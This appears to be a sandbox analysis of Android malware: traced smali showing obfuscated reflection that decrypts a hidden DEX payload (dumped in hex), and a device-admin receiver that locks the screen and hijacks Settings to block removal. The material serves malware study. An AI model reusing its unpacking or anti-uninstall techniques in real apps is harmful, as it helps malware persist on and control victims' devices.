150invoke-virtual {v6, v2, v7}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44476
    • This:
      • public [B android.content.pm.Signature.toByteArray()
      • getName:toByteArray
    • p0: android.content.pm.Signature@d52195d5
    • p1: [Ljava.lang.Object;@1fb5ceb9
    • Return:
      • [B@17b92fe
      • 050;~0*H0J10UUS10UUS10UUS10UUS10U10U0 171022132839Z21540914132839Z0J10UUS10UUS10UUS10UUS10U10U0"0*H0WX^jOK'x`CNG':QtC|pU1!},O?|:>.T3*ov]F#1oQ~+!'GyVo): UyM[52:~V$&] \CBv)J#=. NNkx=FoR]ro`j:>oX"sHZc)!00Uu.2:.'<[0*HWGTZH+Cc;jM?R)+VmPNAdG3"zh1znUjuYc\
      • 308203353082021DA0030201020204063B7E16300D06092A864886F70D01010B0500304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B130031093007060355040313003020170D3137313032323133323833395A180F32313534303931343133323833395A304A310B3009060355040613025553310B3009060355040813025553310B3009060355040713025553310B3009060355040A1302555331093007060355040B1300310930070603550403130030820122300D06092A864886F70D01010105000382010F003082010A0282010100B5570A585EFEF8E96A4F064B2778B1F7AFAE8CA78809A89C604308F794B84E47273AD21BF1517443ECFA7C70FC0C5592E9F131B2217D2CD4B14FA83F9B7C3A1CFEDB3ED42EFFD2C85433017FE0812AFDB91EA7BCD3F4EF6F7613E6E5E95D46F923316F86958EDBB8F4A751A5D1BF7ED22BC82127477956D4D7C0D08119F9D2EF9F6F29CA3A20BA5503B6798AD1E789BE4DC7C8F90CB3065BD135FE9C323A7E56EBCC2489E0265DCA20C3B35C434276294A84230EBEF4EC3D9AF1A5868A9B2E109820014EA1DF4E6BA818A3D18C78B7BB1617A014103D466F52C2905DEFE3726FCCBAB960C30B6AB13ABC3EB10E6FE7EC58FD22731C489809B8A75AE0E1E06329020301
151move-result-object v6
152check-cast v6, [B
153move-object v0, v6
154check-cast v0, [B
155move-object v5, v0
157invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
158move-result-object v6
160const-string v7, "ISM4Bhw4MxQ3PCAcIAg="
162invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
163move-result-object v7
164const/4 v8, 0x1
165new-array v8, v8, [Ljava/lang/Class;
166const/4 v9, 0x0
168const-string v10, "ODM="
170invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
171move-result-object v10
173invoke-static {v10}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
174move-result-object v10
175aput-object v10, v8, v9
177invoke-virtual {v6, v7, v8}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
178move-result-object v6
179const/4 v7, 0x1
180new-array v7, v7, [Ljava/lang/Object;
181const/4 v8, 0x0
182aput-object v5, v7, v8
184invoke-virtual {v6, p0, v7}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44531
    • This:
      • private java.lang.String etxtfvw.cqwwrwk.BROqnOXwFKWnWc(byte[])
      • getName:BROqnOXwFKWnWc
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@917062d
    • p1.Arrays.toString: [[B@17b92fe]
    • Return:
      • 6f0b4c2ebdf76da41b9c70ab26e8851e
185move-result-object v3
187invoke-virtual {p0}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
188move-result-object v6
190const-string v7, "DDU4HgohOBM5OhgHBQ=="
192invoke-virtual {p0, v7}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
193move-result-object v7
194const/4 v8, 0x2
195new-array v8, v8, [Ljava/lang/Class;
196const/4 v9, 0x0
198const-string v10, "ODM="
200invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
201move-result-object v10
203invoke-static {v10}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
204move-result-object v10
205aput-object v10, v8, v9
206const/4 v9, 0x1
208const-string v10, "ODM="
210invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
211move-result-object v10
213invoke-static {v10}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
214move-result-object v10
215aput-object v10, v8, v9
217invoke-virtual {v6, v7, v8}, Ljava/lang/Class;->getDeclaredMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
218move-result-object v6
219const/4 v7, 0x2
220new-array v7, v7, [Ljava/lang/Object;
221const/4 v8, 0x0
223const-string v9, "Ah8TBR0eD00EAx4eWSkCAhJBRg=="
225invoke-virtual {p0, v9}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
226move-result-object v9
228invoke-static {v9}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
229move-result-object v9
231const-string v10, "BxQUGBYS"
233invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
234move-result-object v10
235const/4 v11, 0x2
236new-array v11, v11, [Ljava/lang/Class;
237const/4 v12, 0x0
239const-string v13, "ODM="
241invoke-virtual {p0, v13}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
242move-result-object v13
244invoke-static {v13}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
245move-result-object v13
246aput-object v13, v11, v12
247const/4 v12, 0x1
249sget-object v13, Ljava/lang/Integer;->TYPE:Ljava/lang/Class;
250aput-object v13, v11, v12
252invoke-virtual {v9, v10, v11}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
253move-result-object v9
254const/4 v10, 0x0
255const/4 v11, 0x2
256new-array v11, v11, [Ljava/lang/Object;
257const/4 v12, 0x0
258aput-object p1, v11, v12
259const/4 v12, 0x1
261const-string v13, "Ah8TBR0eD00EAx4eWSkCAhJBRg=="
263invoke-virtual {p0, v13}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
264move-result-object v13
266invoke-static {v13}, Ljava/lang/Class;->forName(Ljava/lang/String;)Ljava/lang/Class;
267move-result-object v13
269const-string v14, "JzQxNic7Pw=="
271invoke-virtual {p0, v14}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
272move-result-object v14
274invoke-virtual {v13, v14}, Ljava/lang/Class;->getField(Ljava/lang/String;)Ljava/lang/reflect/Field;
275move-result-object v13
276const/4 v14, 0x0
278invoke-virtual {v13, v14}, Ljava/lang/reflect/Field;->get(Ljava/lang/Object;)Ljava/lang/Object;
279move-result-object v13
280aput-object v13, v11, v12
282invoke-virtual {v9, v10, v11}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44633
    • This:
      • public static [B android.util.Base64.decode(byte[],int)
      • getName:decode
    • p0: null
    • p1: [Ljava.lang.Object;@1100c6e0
    • p1.Arrays.toString: [[B@11bbda4a, 0]
    • Return:
      • [B@2b2d1d99
      • RHhPeh/b;=Yd;0c6bDc2e2R%6da41b9c[gb$e8H51ee0b(2e`f7*>a4e9ckabl9e8d1e#d0bx.3e2fc7`48c`bd80e1b 3ePg7`48cd`b_d8K0e1b3eg7`48c`b3d8s0e1b3eg7`48c`bd80e1b3e%g7`48c`bd80e1b3eg7`48c`bd80e1b3eWg7`48cv`bwd8`0e\1bL3eg7`48c`bd80e1b73eqg7`48cu`bgd8f0e]1b3eg7`48c`bd80e!1b3eKg7`4w8c~`bfd8g0e]1bC3eg7`48c`bd80e1b3eg7`48c`bd80e31b?3elg7!`48c`bud8d0eY1bL3eg7`48c`bd80e1b;3e|g7`48c`b}
      • 5203486804500765682F62093B9009B21E3D1AAEC5A059881C8564FC9D3B30630AF43662446332651A32522536646134316239635BA16762D124653848353165BE653062C8283265926066372A3E6134916539636BA561626C39653864E7316523643062782E336532666337DAEB6034DDED3863D9BF6062C3B96438CCBA3065CEE9316220F3336550F4673703F4603408F2386364A060625FA664384BA53065A4F63162ABF33365CEF46737F4F46034E4F23863DDA0606233A7643873A43065BFF73162A8F23365C5F5673785F56034F3F33863FBA16062EBA76438D1A43065CEF73162CBF2336525F66737B3F66034BFF03863A2A26062AFA464389AA7306591F4316298F13365D7F6673789F66034FDF03863E4A26062E4A46438E1A7306515F5316206F0336557F767370DF760340FF1386376A3606277A5643860A630655CF531624CF03365E9F76737A8F7603483F1386389A36062E1A56438D0A63065C1F5316237F7336571F067371EF0603409F6386375A4606267A2643866A130655DF23162B2F73365F6F067379FF0603486F63863E7A46062DBA26438C4A1306521F3316214F633654BF167371AF1603477F738637EA5606266A3643867A030655DF3316243F63365E1F16737A6F16034ACF738639DA560628AA36438FEA03065FAF33162E5F63365B8F16737D6F16034DAF73863C6A56062CAA36438C6A03065
283move-result-object v9
284aput-object v9, v7, v8
285const/4 v8, 0x1
287invoke-virtual {v3}, Ljava/lang/Object;->getClass()Ljava/lang/Class;
288move-result-object v9
290const-string v10, "BBQDNQsDDhA="
292invoke-virtual {p0, v10}, Letxtfvw/cqwwrwk;->unFeJNljZsjaw(Ljava/lang/String;)Ljava/lang/String;
293move-result-object v10
294const/4 v11, 0x0
295new-array v11, v11, [Ljava/lang/Class;
297invoke-virtual {v9, v10, v11}, Ljava/lang/Class;->getMethod(Ljava/lang/String;[Ljava/lang/Class;)Ljava/lang/reflect/Method;
298move-result-object v9
299const/4 v10, 0x0
300new-array v10, v10, [Ljava/lang/Object;
302invoke-virtual {v9, v3, v10}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44816
    • This:
      • public [B java.lang.String.getBytes()
      • getName:getBytes
    • p0: 6f0b4c2ebdf76da41b9c70ab26e8851e
    • p1: [Ljava.lang.Object;@5a8fa55
    • Return:
      • [B@17f6ac6a
      • 6f0b4c2ebdf76da41b9c70ab26e8851e
      • 3666306234633265626466373664613431623963373061623236653838353165
303move-result-object v9
304aput-object v9, v7, v8
306invoke-virtual {v6, p0, v7}, Ljava/lang/reflect/Method;->invoke(Ljava/lang/Object;[Ljava/lang/Object;)Ljava/lang/Object;
  • Time: 44844
    • This:
      • private static [B etxtfvw.cqwwrwk.oDOixVSpHMour(byte[],byte[])
      • getName:oDOixVSpHMour
    • p0: etxtfvw.cqwwrwk@32c17d93
    • p1: [Ljava.lang.Object;@3ad491f8
    • p1.Arrays.toString: [[B@2b2d1d99, [B@17f6ac6a]
    • Return:
      • [B@2ecbe6d1
      • dex035K>h/_#8.<pxV4lpKZ\^\LMP259SmsKG#25;>AEXjx(8BU^k ),FIT_kw#7G\ox/>HO
      • 6465780A303335000A4B043E0DF468862F5F23CDF29038EA2EB301C4A50E01063C920600700000007856341200000000000000006C910600E31200007000000088030000FC4B0000F00400001C5A0000A00700005C9500005E0F00005CD20000150200004C4D010050020500EC8F0100EC8F0100EE8F0100F18F0100F48F0100F88F010014900100329001003590010039900100539001006D90010073900100929001009F900100AC900100C2900100D5900100EA900100019101004B910100899101009C910100A7910100B3910100C2910100CC910100D9910100E9910100F8910100FF91010047920100859201008E920100959201009D920100A2920100A7920100AC920100B5920100BF920100CC920100D3920100D6920100D99201002393010032930100359301003B9301003E9301004193010045930100589301006A930100789301008B9301009E930100B2930100BE930100D3930100E8930100F79301000394010013940100289401003894010042940100559401005E9401006B9401008694010094940100A9940100B7940100D0940100E9940100FC9401001795010020950100299501002C9501004695010049950100549501005F9501006B9501007795010083950100909501009D950100AA950100B8950100C6950100CC950100D1950100DA950100E0950100EB950100F1950100F8950100FE950100
307move-result-object v6
308check-cast v6, [B
309check-cast v6, [B
310try_end_199: return-object v6
311catch_19a: move-exception v6
312cond_19b: const/4 v6, 0x0
313new-array v6, v6, [B
314goto/16 :goto_199
Cross References
APIs
  • android.content.Intent.getAction
  • java.lang.String.equals
  • android.content.Context.getPackageManager
  • java.util.ArrayList.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • android.content.Intent.<init>
  • android.content.Intent.addCategory
  • android.content.Context.getPackageManager
  • android.content.pm.PackageManager.queryIntentActivities
  • java.util.ArrayList.<init>
  • java.util.List.iterator
  • java.util.Iterator.hasNext
  • java.util.Iterator.next
  • java.util.ArrayList.add
  • java.util.ArrayList.contains
  • android.content.pm.PackageManager.getLaunchIntentForPackage
  • android.content.Intent.setFlags
  • android.content.Context.startActivity
  • android.app.admin.DevicePolicyManager.lockNow
  • android.content.Intent.<init>
  • android.content.Intent.setFlags
  • android.content.Intent.addFlags
  • android.content.Context.startActivity
  • java.util.concurrent.atomic.AtomicInteger.<init>
  • android.os.Handler.<init>
  • android.os.Handler.postDelayed
  • android.content.Intent.getAction
  • java.lang.String.equals
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • android.content.Context.getPackageManager
  • android.content.Context.getPackageName
  • android.content.pm.PackageManager.getLaunchIntentForPackage
  • android.content.Intent.addFlags
  • android.content.Context.startActivity
  • android.content.Intent.getAction
  • java.lang.String.equals
  • java.lang.StringBuilder.<init>
  • java.lang.StringBuilder.append
  • java.lang.StringBuilder.toString
  • android.os.Handler.removeCallbacksAndMessages
  • android.content.Intent.getBooleanExtra
Strings
  • android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED
  • android.intent.action.MAIN
  • android.intent.category.LAUNCHER
  • android.settings.SETTINGS
  • android.app.action.DEVICE_ADMIN_ENABLED
  • AdminGranted
  • vendor
  • model
  • sdkHash
  • version
  • android.app.action.DEVICE_ADMIN_DISABLED
  • AdminDisabled
  • restart
Position Instruction Meta Information
0const/4 v10, 0x0
1const/4 v3, 0x1
2const/4 v2, 0x0
3if-eqz p1, :cond_b
5invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
  • Time: 56131
    • This:
      • Intent { cmp=com.czybg.eqtbdmzpklrgyns/.KezZERjCGv7fpQLHuQ (has extras) }
    • Return:
      • null
6move-result-object v0
7if-nez v0, :cond_c
8cond_b: return-void
9cond_c:
10iget-object v4, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->hZyMGHgz:Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;
12const-string v0, "android.app.action.DEVICE_ADMIN_DISABLE_REQUESTED"
14invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
15move-result-object v1
17invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
18move-result v0
19if-eqz v0, :cond_f1
21iget-object v0, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
23invoke-virtual {v0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
24move-result-object v5
26iget-object v0, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->LmcGi:Ljava/util/ArrayList;
28invoke-virtual {v0}, Ljava/util/ArrayList;->iterator()Ljava/util/Iterator;
29move-result-object v6
30cond_26:
31invoke-interface {v6}, Ljava/util/Iterator;->hasNext()Z
32move-result v0
33if-eqz v0, :cond_80
35invoke-interface {v6}, Ljava/util/Iterator;->next()Ljava/lang/Object;
36move-result-object v0
37check-cast v0, Ljava/lang/String;
39iget-object v1, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
40new-instance v7, Landroid/content/Intent;
42const-string v8, "android.intent.action.MAIN"
44invoke-direct {v7, v8, v10}, Landroid/content/Intent;-><init>(Ljava/lang/String;Landroid/net/Uri;)V
46const-string v8, "android.intent.category.LAUNCHER"
48invoke-virtual {v7, v8}, Landroid/content/Intent;->addCategory(Ljava/lang/String;)Landroid/content/Intent;
50invoke-virtual {v1}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
51move-result-object v1
53invoke-virtual {v1, v7, v2}, Landroid/content/pm/PackageManager;->queryIntentActivities(Landroid/content/Intent;I)Ljava/util/List;
54move-result-object v1
55new-instance v7, Ljava/util/ArrayList;
57invoke-direct {v7}, Ljava/util/ArrayList;-><init>()V
59invoke-interface {v1}, Ljava/util/List;->iterator()Ljava/util/Iterator;
60move-result-object v8
61cond_51:
62invoke-interface {v8}, Ljava/util/Iterator;->hasNext()Z
63move-result v1
64if-eqz v1, :cond_69
66invoke-interface {v8}, Ljava/util/Iterator;->next()Ljava/lang/Object;
67move-result-object v1
68check-cast v1, Landroid/content/pm/ResolveInfo;
70iget-object v9, v1, Landroid/content/pm/ResolveInfo;->activityInfo:Landroid/content/pm/ActivityInfo;
71if-eqz v9, :cond_51
73iget-object v1, v1, Landroid/content/pm/ResolveInfo;->activityInfo:Landroid/content/pm/ActivityInfo;
75iget-object v1, v1, Landroid/content/pm/ActivityInfo;->packageName:Ljava/lang/String;
77invoke-virtual {v7, v1}, Ljava/util/ArrayList;->add(Ljava/lang/Object;)Z
78goto/16 :goto_51
79cond_69:
80invoke-virtual {v7, v0}, Ljava/util/ArrayList;->contains(Ljava/lang/Object;)Z
81move-result v1
82if-eqz v1, :cond_26
84iget-object v1, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
86invoke-virtual {v5, v0}, Landroid/content/pm/PackageManager;->getLaunchIntentForPackage(Ljava/lang/String;)Landroid/content/Intent;
87move-result-object v0
88const v7, 0x10008000
90invoke-virtual {v0, v7}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
91move-result-object v0
93invoke-virtual {v1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
94goto/16 :goto_26
95cond_80:
96iget-object v0, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/OfsZk;
98invoke-interface {v0}, Lcom/czybg/eqtbdmzpklrgyns/OfsZk;->DiXsQ()V
100iget-object v0, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->Odjrct:Landroid/app/admin/DevicePolicyManager;
102invoke-virtual {v0}, Landroid/app/admin/DevicePolicyManager;->lockNow()V
103new-instance v0, Landroid/content/Intent;
105const-string v1, "android.settings.SETTINGS"
107invoke-direct {v0, v1}, Landroid/content/Intent;-><init>(Ljava/lang/String;)V
108const/high16 v1, 0x10000000
110invoke-virtual {v0, v1}, Landroid/content/Intent;->setFlags(I)Landroid/content/Intent;
111const/high16 v1, 0x4000000
113invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
114sget v1, Landroid/os/Build$VERSION;->SDK_INT:I
115const/16 v5, 0xb
116if-lt v1, v5, :cond_a7
117const v1, 0x8000
119invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
120cond_a7: const/high16 v1, 0x40000000 # 2.0f
122invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
123const/high16 v1, 0x800000
125invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
127iget-object v1, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
129invoke-virtual {v1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
130new-instance v0, Ljava/util/concurrent/atomic/AtomicInteger;
132invoke-direct {v0, v2}, Ljava/util/concurrent/atomic/AtomicInteger;-><init>(I)V
133new-instance v1, Landroid/os/Handler;
135invoke-direct {v1}, Landroid/os/Handler;-><init>()V
136new-instance v5, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;
138invoke-direct {v5, v4, v0, v1}, Lcom/czybg/eqtbdmzpklrgyns/OkDGL;-><init>(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;Ljava/util/concurrent/atomic/AtomicInteger;Landroid/os/Handler;)V
139const-wide/16 v6, 0x12c
141invoke-virtual {v1, v5, v6, v7}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
142new-instance v0, Lcom/czybg/eqtbdmzpklrgyns/KHwsIuf;
144invoke-direct {v0, v4}, Lcom/czybg/eqtbdmzpklrgyns/KHwsIuf;-><init>(Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;)V
145const-wide/16 v4, 0x7d0
147invoke-virtual {v1, v0, v4, v5}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
148move v0, v3
149goto_d5: if-nez v0, :cond_b
151invoke-static {}, Lcom/czybg/eqtbdmzpklrgyns/DxwHORco;->DiXsQ()Z
153iget-object v1, p0, Lcom/czybg/eqtbdmzpklrgyns/QsRifJa;->xnLvoQ:Lcom/czybg/eqtbdmzpklrgyns/qwAiT;
154iget-boolean v0, v1, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->xnLvoQ:Z
155if-nez v0, :cond_1eb
156move v0, v2
157goto_e1: if-eqz v0, :cond_209
159iget-object v0, v1, Lcom/czybg/eqtbdmzpklrgyns/qwAiT;->DiXsQ:Landroid/os/Handler;
160new-instance v2, Lcom/czybg/eqtbdmzpklrgyns/zAKRpGn;
162invoke-direct {v2, v1}, Lcom/czybg/eqtbdmzpklrgyns/zAKRpGn;-><init>(Lcom/czybg/eqtbdmzpklrgyns/qwAiT;)V
163const-wide/16 v3, 0xfa0
165invoke-virtual {v0, v2, v3, v4}, Landroid/os/Handler;->postDelayed(Ljava/lang/Runnable;J)Z
166goto/16 :goto_b
167cond_f1:
168const-string v0, "android.app.action.DEVICE_ADMIN_ENABLED"
170invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
171move-result-object v1
173invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
174move-result v0
175if-eqz v0, :cond_17c
177invoke-static {}, Lmpcom/crashlytics/android/answers/Answers;->getInstance()Lmpcom/crashlytics/android/answers/Answers;
178move-result-object v5
179new-instance v1, Lmpcom/crashlytics/android/answers/CustomEvent;
181const-string v0, "AdminGranted"
183invoke-direct {v1, v0}, Lmpcom/crashlytics/android/answers/CustomEvent;-><init>(Ljava/lang/String;)V
185const-string v6, "vendor"
187sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
188if-eqz v0, :cond_176
190sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
191goto_110:
192invoke-virtual {v1, v6, v0}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
193move-result-object v0
194check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
196const-string v6, "model"
198sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
199if-eqz v1, :cond_179
201sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
202goto_11e:
203invoke-virtual {v0, v6, v1}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
204move-result-object v0
205check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
207const-string v1, "sdkHash"
208new-instance v6, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
210iget-object v7, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
212invoke-direct {v6, v7}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
214invoke-virtual {v6}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->hZyMGHgz()Ljava/lang/String;
215move-result-object v6
217invoke-virtual {v0, v1, v6}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
218move-result-object v0
219check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
221const-string v1, "version"
222new-instance v6, Ljava/lang/StringBuilder;
224invoke-direct {v6}, Ljava/lang/StringBuilder;-><init>()V
225sget v7, Landroid/os/Build$VERSION;->SDK_INT:I
227invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
228move-result-object v6
230invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
231move-result-object v6
233invoke-virtual {v0, v1, v6}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
234move-result-object v0
235check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
237invoke-virtual {v5, v0}, Lmpcom/crashlytics/android/answers/Answers;->logCustom(Lmpcom/crashlytics/android/answers/CustomEvent;)V
239iget-object v0, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
241invoke-virtual {v0}, Landroid/content/Context;->getPackageManager()Landroid/content/pm/PackageManager;
242move-result-object v0
244iget-object v1, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
246invoke-virtual {v1}, Landroid/content/Context;->getPackageName()Ljava/lang/String;
247move-result-object v1
249invoke-virtual {v0, v1}, Landroid/content/pm/PackageManager;->getLaunchIntentForPackage(Ljava/lang/String;)Landroid/content/Intent;
250move-result-object v0
251if-eqz v0, :cond_16e
252const v1, 0x14008000
254invoke-virtual {v0, v1}, Landroid/content/Intent;->addFlags(I)Landroid/content/Intent;
256iget-object v1, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
258invoke-virtual {v1, v0}, Landroid/content/Context;->startActivity(Landroid/content/Intent;)V
259cond_16e:
260iget-object v0, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
262invoke-static {v0}, Lcom/czybg/eqtbdmzpklrgyns/HLqFdR;->Odjrct(Landroid/content/Context;)V
263move v0, v3
264goto/16 :goto_d5
265cond_176:
266const-string v0, ""
267goto/16 :goto_110
268cond_179:
269const-string v1, ""
270goto/16 :goto_11e
271cond_17c:
272const-string v0, "android.app.action.DEVICE_ADMIN_DISABLED"
274invoke-virtual {p1}, Landroid/content/Intent;->getAction()Ljava/lang/String;
275move-result-object v1
277invoke-virtual {v0, v1}, Ljava/lang/String;->equals(Ljava/lang/Object;)Z
278move-result v0
279if-eqz v0, :cond_1e8
281invoke-static {}, Lmpcom/crashlytics/android/answers/Answers;->getInstance()Lmpcom/crashlytics/android/answers/Answers;
282move-result-object v5
283new-instance v1, Lmpcom/crashlytics/android/answers/CustomEvent;
285const-string v0, "AdminDisabled"
287invoke-direct {v1, v0}, Lmpcom/crashlytics/android/answers/CustomEvent;-><init>(Ljava/lang/String;)V
289const-string v6, "vendor"
291sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
292if-eqz v0, :cond_1e2
294sget-object v0, Landroid/os/Build;->MANUFACTURER:Ljava/lang/String;
295goto_19b:
296invoke-virtual {v1, v6, v0}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
297move-result-object v0
298check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
300const-string v6, "model"
302sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
303if-eqz v1, :cond_1e5
305sget-object v1, Landroid/os/Build;->MODEL:Ljava/lang/String;
306goto_1a9:
307invoke-virtual {v0, v6, v1}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
308move-result-object v0
309check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
311const-string v1, "sdkHash"
312new-instance v6, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;
314iget-object v7, v4, Lcom/czybg/eqtbdmzpklrgyns/hekJfDg;->hZyMGHgz:Landroid/content/Context;
316invoke-direct {v6, v7}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;-><init>(Landroid/content/Context;)V
318invoke-virtual {v6}, Lcom/czybg/eqtbdmzpklrgyns/EZmcnv;->hZyMGHgz()Ljava/lang/String;
319move-result-object v6
321invoke-virtual {v0, v1, v6}, Lmpcom/crashlytics/android/answers/CustomEvent;->putCustomAttribute(Ljava/lang/String;Ljava/lang/String;)Lmpcom/crashlytics/android/answers/AnswersEvent;
322move-result-object v0
323check-cast v0, Lmpcom/crashlytics/android/answers/CustomEvent;
325const-string v1, "version"
326new-instance v6, Ljava/lang/StringBuilder;
328invoke-direct {v6}, Ljava/lang/StringBuilder;-><init>()V
329sget v7, Landroid/os/Build$VERSION;->SDK_INT:I
331invoke-virtual {v6, v7}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
332move-result-object v6
334invoke-virtual {v6}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
335move-result-object v6
